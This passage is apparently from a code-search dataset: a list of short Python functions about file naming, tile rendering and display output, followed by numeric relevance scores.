iter_name + (\"t%s\" % level)", "def _PartName(self,partindex,nparts):\n\n\t\tfrom tempfile import mkstemp\n\t\timport os\n\n\t\tp = '%d_%d' % (partindex, nparts * nparts - 1)\n\t\tfd,name = mkstemp(prefix = p, suffix = '.image')\n\t\tos.close(fd)\n\t\tself.result = name\n\t\treturn name", "def file_name(id, title, kind=\"src\"):\n fn_template = conf.template_source_file_name\n if kind == \"tst\":\n fn_template = conf.template_test_file_name\n\n return fn_template.format(id=id, title=title.replace(\"-\", \"_\"))", "def printfile(self, event=None):\n filename = self.en.get()\n bbox = self.canvas.bbox(ALL)\n width=bbox.right*self.unit\n height=bbox.bottom*self.unit\n self.canvas.config(width=width, height=height)\n self.canvas.dump(filename)\n self.canvas.config(width=self.ca_width, height=self.ca_height)\n self.la.config(text='Wrote file ' + filename)", "def dataset_part_filename(dataset_part, num_data):\n if num_data >= 0:\n return '{}_data_{}.npz'.format(dataset_part, str(num_data))\n return '{}_data.npz'.format(dataset_part)", "def shard_filename(path, tag, shard_num, total_shards):\n return os.path.join(\n path, \"%s-%s-%.5d-of-%.5d\" % (_PREFIX, tag, shard_num, total_shards))", "def _file_name(size):\n timestamp = str(int(time.time()))\n return '%s_%dx%d.%s' % (timestamp, size, size, 'jpg')", "def summary(self):\n self.tiles.refreshnames()\n self.glues.refreshnames()\n # self.check_consistent()\n info = {\n \"ntiles\": len(self.tiles),\n \"nrt\": len([x for x in self.tiles if not x.is_fake]),\n \"nft\": len([x for x in self.tiles if x.is_fake]),\n \"nends\": len(self.glues),\n \"ntends\": len(self.tiles.glues_from_tiles()),\n \"tns\": \" \".join(x.name for x in self.tiles if x.name),\n \"ens\": \" \".join(x.name for x in self.glues if x.name)\n # if (\"info\" in self.keys() and \"name\" in self[\"info\"].keys())\n # else \"\",\n }\n tun = sum(1 for x in self.tiles if x.name is None)\n if tun > 0:\n info[\"tns\"] += \" ({} unnamed)\".format(tun)\n eun = sum(1 for x in self.glues if x.name is None)\n if eun > 0:\n info[\"ens\"] += \" ({} unnamed)\".format(eun)\n if info[\"nft\"] > 0:\n info[\"nft\"] = \" (+ {} fake)\".format(info[\"nft\"])\n else:\n info[\"nft\"] = \"\"\n return \"TileSet: {nrt} tiles{nft}, {nends} ends, {ntends} ends in tiles.\\nTiles: {tns}\\nEnds: {ens}\".format(\n **info\n )", "def save(self, fn: str) -> None:\n fout = open(fn, 'w')\n for t,x in zip(self.times,self.milestones):\n fout.write('%f\\t%d '%(t,len(x)))\n fout.write(' '.join([str(xi) for xi in x]))\n fout.write('\\n')\n fout.close()", "def map_displayer(stage, player,\n stage_tiles, TILES, special_tiles, default_tile):\n color.write(\"=============================================\\n\",\"BUILTIN\") # Hard seperation to show that a new turn has begun\n # Setup variables\n x = 1\n y = stage[1]\n player_x = player[0]\n player_y = player[1]\n\n while y > 0:\n while x < stage[0]+1:\n if x == player_x and y == player_y:\n color.write(TILES.get(\"player\", \"X\"), \"hit\")\n\n elif (\"{0},{1}\".format(x, y) in stage_tiles\n and \"{0},{1}\".format(x, y) in special_tiles):\n if (stage_tiles[\"{0},{1}\".format(x, y)] == \"npc\"\n or stage_tiles[\"{0},{1}\".format(x, y)] == \"sign\"):\n tile = stage_tiles.get(\"{0},{1}\".format(x, y), default_tile)\n color.write(TILES[tile], \"KEYWORD\")\n \n else:\n tile = stage_tiles.get(\"{0},{1}\".format(x, y), default_tile)\n color.write(TILES[tile], \"STRING\")\n\n elif \"{0},{1}\".format(x, y) in stage_tiles:\n if (stage_tiles[\"{0},{1}\".format(x, y)] == \"rock\"\n or 
stage_tiles[\"{0},{1}\".format(x, y)] == \"mountain\"):\n tile = stage_tiles.get(\"{0},{1}\".format(x, y), default_tile)\n color.write(TILES[tile], \"stderr\")\n\n else:\n tile = stage_tiles.get(\"{0},{1}\".format(x, y), default_tile)\n color.write(TILES[tile], \"stdout\")\n\n elif \"{0},{1}\".format(x,y) in special_tiles:\n if (special_tiles[\"{0},{1}\".format(x, y)] == \"dark_water\"):\n tile = stage_tiles.get(\"{0},{1}\".format(x, y), default_tile)\n color.write(TILES[tile],\"stdin\") \n else:\n print(TILES[default_tile], end='')\n x += 1\n print(\" \",end='')\n print(\"\")\n y -= 1\n x = 1", "def tile_id(self):\n return self._tile_id", "def filename(self, age, metal, imf=None):\n imf = 1.3 if imf is None else imf\n msign = \"p\" if metal >= 0. else \"m\"\n azero = \"0\" if age < 10. else \"\"\n fname = \"Ebi{0:.2f}Z{1}{2:.2f}T{3}{4:02.4f}_iTp0.00_baseFe.fits\".format(\n imf, msign, abs(metal), azero, age)\n return os.path.join(self.data_dir, fname)", "def get_filename(problem, width=3):\n return '{0:0{w}d}.py'.format(problem, w=width)", "def displayname(self):\n if self.path.is_dir():\n if (is_uuid(self.path.parts[-1])):\n self.is_uuid_folder = True\n return self.path.name + '/'\n elif is_proj(self.path.parts[-1]):\n return f'{bcolors.BOLD}' + self.path.name + f'{bcolors.ENDC}'\n return self.path.name", "def outname(self,sctn):\n return '%s_%s.html'%(self.basename,sctn)", "def __getTileSizeName(self, iter_name, level):\n return (\"T%s\" % level) + iter_name", "def save_top_tiles_on_original_image(pil_img, slide_name):\n t = Time()\n filepath = slide.get_top_tiles_on_original_image_path(slide_name)\n pil_img.save(filepath)\n print(\"%-20s | Time: %-14s Name: %s\" % (\"Save Top Orig\", str(t.elapsed()), filepath))", "def generate_tile_description(tile, time = None, depth = None):\n \n desc = \"s\"+ str(tile)\n if depth is not None:\n desc = desc + \"_z\" + str(depth)\n if time is not None:\n desc = desc + \"_t\" + str(time)\n return desc", "def file_on_disk_name(instance, filename):\n return generate_file_on_disk_name(instance.checksum, filename)", "def mugshot_file(self, instance):\r\n try:\r\n return admin_display_file(instance.user.user_files, 'mugshot')\r\n except Exception:\r\n return mark_safe('<i class=\"fa fa-times-circle red\" aria-hidden=\"true\"></i>')", "def number(cls, tileName):\n return TILENAMEMAP[tileName]['Number'] if tileName in TILENAMEMAP else None", "def favorite_number():\n\ttry:\n\t\tprint_number()\n\texcept FileNotFoundError:\n\t\tstore_number()\n\t\tprint_number()", "def get_file_name(self):\n return str(self.get_file())", "def display(self):\n for row in self.tile_rows:\n print(row)", "def render_tile(self, filename, tile_x, tile_y, zoom):\n print 'Rendering %s' % (filename)\n\n # Calculate pixel positions of bottom-left & top-right\n half_width = self.width / 2\n half_height = self.height / 2\n px0 = (tile_x * self.width, (tile_y + 1) * self.height)\n px1 = ((tile_x + 1) * self.width, tile_y * self.height)\n\n # Convert tile coords to LatLng\n ll0 = self.tile_projection.fromPixelToLL(px0, zoom);\n ll1 = self.tile_projection.fromPixelToLL(px1, zoom);\n \n # Convert LatLng to map coords\n c0 = self.map_projection.forward(mapnik2.Coord(ll0[0], ll0[1]))\n c1 = self.map_projection.forward(mapnik2.Coord(ll1[0], ll1[1]))\n\n # Create bounding box for the render\n bbox = mapnik2.Box2d(c0.x, c0.y, c1.x, c1.y)\n\n self.mapnik_map.zoom_to_box(bbox)\n self.mapnik_map.buffer_size = max([half_width, half_height]) \n\n # Render image with default Agg renderer\n image = 
mapnik2.Image(self.width, self.height)\n mapnik2.render(self.mapnik_map, image)\n image.save(filename, self.filetype)", "def __repr__(self) -> str:\n\n return f\"{self.filename}:{self.line}:{self.flag}\"", "def init_data_file_name():\n now = datetime.datetime.now().isoformat().split('.')[0].replace(':', '-')\n filename = 'show-commands-' + now + \".txt\"\n return filename", "def display(self, contents=False, recurse=False): # FileObj.display\n print '# File\\t\\t' + str(self.deleted) + '\\t' + str(self.ignore) + '\\t' + str(self.depth) + '\\t' + self.hexdigest + ' ' + self.pathname + ' '", "def __printThePath(self, tile):\n print()\n print(\"Path is found. Initial tile: \" + str(self.startingPoint) + \", Goal tile: \" + str(self.goalPoint))\n print(\"Here is the path cost: \" + str(tile.cost) + \" and path is:\")\n print(tile.pathToTile[::-1])\n print()", "def _repr_(self):\n if self.is_multitape:\n pos = tuple(p for p, t in sorted(self.position, key=lambda x: x[1]))\n return 'multi-tape at %s' % (pos,)\n else:\n return 'tape at %s' % (self.position[0][0],)", "def summary_title(tile_summary):\n return f\"Slide tile_summary.slide_name Tile Summary:\"", "def save(self, dataset, name=None):\n if name is None:\n prefix = 'checkpoints/' + self.model_name + '_' + dataset + '_'\n name = time.strftime(prefix + '%m%d_%H:%M:%S.pth')\n torch.save(self.state_dict(), name)\n return name", "def show(self,mode=0,level=0,ident=''):\n if self.locked : l='L'\n else : l=' '\n tmp= '%sd%-3d %s %-6s %-30s Vendor: %-10s %-10s Size: %10s' % \\\n (ident,self.idx,l,self.name,self.guid.strip()[-29:],self.vendor,self.model,printsz(self.size))\n if level>0:\n tmp+='\\n'+ident+' Paths:'\n for p in self.paths.values() : tmp+='\\n'+p.show(mode,level-1,ident+' ')\n tmp+='\\n'+ident+' Partitions:'\n for p in self.partitions.values() : tmp+='\\n'+p.show(mode,level-1,ident+' ')\n tmp+='\\n'\n return tmp", "def getImageTile(self, **kwargs):\n if self.hasImage():\n imgtileurl = self.getImage().absolute_url(1) + '_tile'\n portal_obj = getToolByName(self, 'portal_url').getPortalObject()\n portal_url = portal_obj.absolute_url(1)\n imgtileurl = imgtileurl.replace(portal_url, '')\n return imgtileurl\n return ''", "def draw_tile(tile_id):\n if tile_id == 0:\n return \" \"\n if tile_id == 1:\n return \"#\"\n if tile_id == 2:\n return \"+\"\n if tile_id == 3:\n return \"-\"\n return \"o\"", "def get_runinfo_basename():\n return \"dumpruninfo\"", "def ofile_name(self):\n return self.ofile", "def _print_info(self,\n step,\n loss,\n t_cost):\n format_str = ('{0}: step {1}, loss = {2:.2f}' \\\n '({3:.3f} sec/batch)')\n print format_str.format(datetime.now(), \\\n step, loss, t_cost)", "def dump_with_name(self, id_to_name):\n return str(id_to_name[self.player]) + str(self._num)", "def display_recent_shot(self, idx):\n self.display_shot(self.recent_shots[idx])", "def _save_target_info(self):\n \n #make sure the file exists\n path = self.communicator.image_store.project_path + \\\n self.target_file_name\n fout = open(path, 'w')\n\n print str(1)\n print str(len(self.target_list)-1)\n for i in range(1, len(self.target_list)):\n fout.write(self.target_list[i].format_info())\n fout.write(\"\\n\\n\")\n fout.close()", "def getNoteFileName(self, show, sequence, id):\n idPadded = self.__getPaddedId(id)\n fileName = Mode(show, sequence).get(\"[noteBaseName]\", {\"id\":idPadded})\n\n# log(\"getNoteFileName id: %s fileName: %s\" % (id, fileName))\n\n return fileName" ]
[ "0.7170778", "0.7017842", "0.62615716", "0.6062539", "0.6021516", "0.58989334", "0.5845273", "0.58161515", "0.5786859", "0.5772618", "0.5726611", "0.56966686", "0.568967", "0.5651235", "0.56373155", "0.5635666", "0.56198174", "0.5595406", "0.5574993", "0.5558204", "0.555806", "0.5532269", "0.5509232", "0.5489894", "0.5483133", "0.54824036", "0.54767215", "0.5471302", "0.54673797", "0.5435514", "0.542785", "0.54168427", "0.53953314", "0.53942585", "0.53881335", "0.5388119", "0.5373697", "0.5359125", "0.53588235", "0.5355472", "0.53463835", "0.53452724", "0.5344886", "0.53344804", "0.5333621", "0.5323911", "0.5285026", "0.5284034", "0.5281534", "0.5278909", "0.5265584", "0.5264429", "0.52434826", "0.52428406", "0.52414733", "0.5238826", "0.5238007", "0.5236074", "0.52322036", "0.5232053", "0.5230393", "0.5224431", "0.5223597", "0.52183735", "0.5214858", "0.52122444", "0.52119863", "0.5203053", "0.5191486", "0.5190306", "0.5175886", "0.51723135", "0.51670194", "0.5156692", "0.51525176", "0.51399004", "0.51325095", "0.51308113", "0.51229364", "0.5121248", "0.512032", "0.5119168", "0.5116024", "0.5108937", "0.5101353", "0.50998396", "0.5099116", "0.5096093", "0.5091127", "0.508694", "0.507942", "0.5076065", "0.5074788", "0.5071387", "0.5067344", "0.50638837", "0.5061053", "0.505541", "0.505295", "0.5037424" ]
0.68945366
2
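
The record closes with three numeric fields: a bracketed list of score values stored as strings, a single standalone score, and a final small integer. A minimal sketch follows, assuming (this is an interpretation, not stated in the record itself) that the list holds one relevance score per distractor snippet above, the standalone value is the score of the primary snippet, and the last integer is its resulting rank; all variable names are illustrative and not taken from any particular loading library.

    # Minimal sketch for reading the trailing numeric fields of a record like the one above.
    # Assumption: scores are stored as strings and must be converted before use.

    # Illustrative values, truncated from the record above for brevity.
    snippet_scores_raw = ["0.7170778", "0.7017842", "0.62615716"]
    primary_score_raw = "0.68945366"
    rank_raw = "2"

    # Convert string-encoded numbers to native types.
    snippet_scores = [float(s) for s in snippet_scores_raw]
    primary_score = float(primary_score_raw)
    rank = int(rank_raw)

    # Example sanity check: count distractor snippets scoring above the primary snippet.
    higher = sum(score > primary_score for score in snippet_scores)
    print(f"{higher} of {len(snippet_scores)} snippets score above "
          f"{primary_score:.4f}; stored rank is {rank}")

Run as-is, this prints how many of the sample scores exceed the primary score, which is one plausible way such a rank value could be derived; whether the dataset actually computes its rank this way is an assumption, not something the record confirms.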